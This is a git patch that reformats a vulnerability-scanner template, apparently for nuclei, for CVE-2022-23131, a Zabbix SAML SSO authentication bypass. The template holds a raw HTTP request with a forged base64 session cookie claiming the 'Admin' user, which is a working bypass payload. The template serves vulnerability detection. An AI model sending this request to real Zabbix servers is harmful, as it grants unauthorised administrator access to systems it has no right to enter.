From 23ea9fc5e1535f7c3fcb89af1efa46f2e762d244 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 23 Feb 2022 15:40:37 +0530 Subject: [PATCH] Update CVE-2022-23131.yaml --- cves/2022/CVE-2022-23131.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml index a5b9c0d05e..f9d9ca2ccf 100644 --- a/cves/2022/CVE-2022-23131.yaml +++ b/cves/2022/CVE-2022-23131.yaml @@ -1,25 +1,25 @@ id: CVE-2022-23131 info: - name: Zabbix Saml Bypass + name: Zabbix - SAML SSO Authentication Bypass author: For3stCo1d severity: high description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. reference: - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://github.com/Mr-xn/cve-2022-23131 - tags: cve,cve2022,zabbix classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.8 cve-id: CVE-2022-23131 + tags: cve,cve2022,zabbix,auth-bypass requests: - raw: - - | - GET /index_sso.php HTTP/1.1 - Host: {{Hostname}} - Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9 + - | + GET /index_sso.php HTTP/1.1 + Host: {{Hostname}} + Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9 matchers-condition: and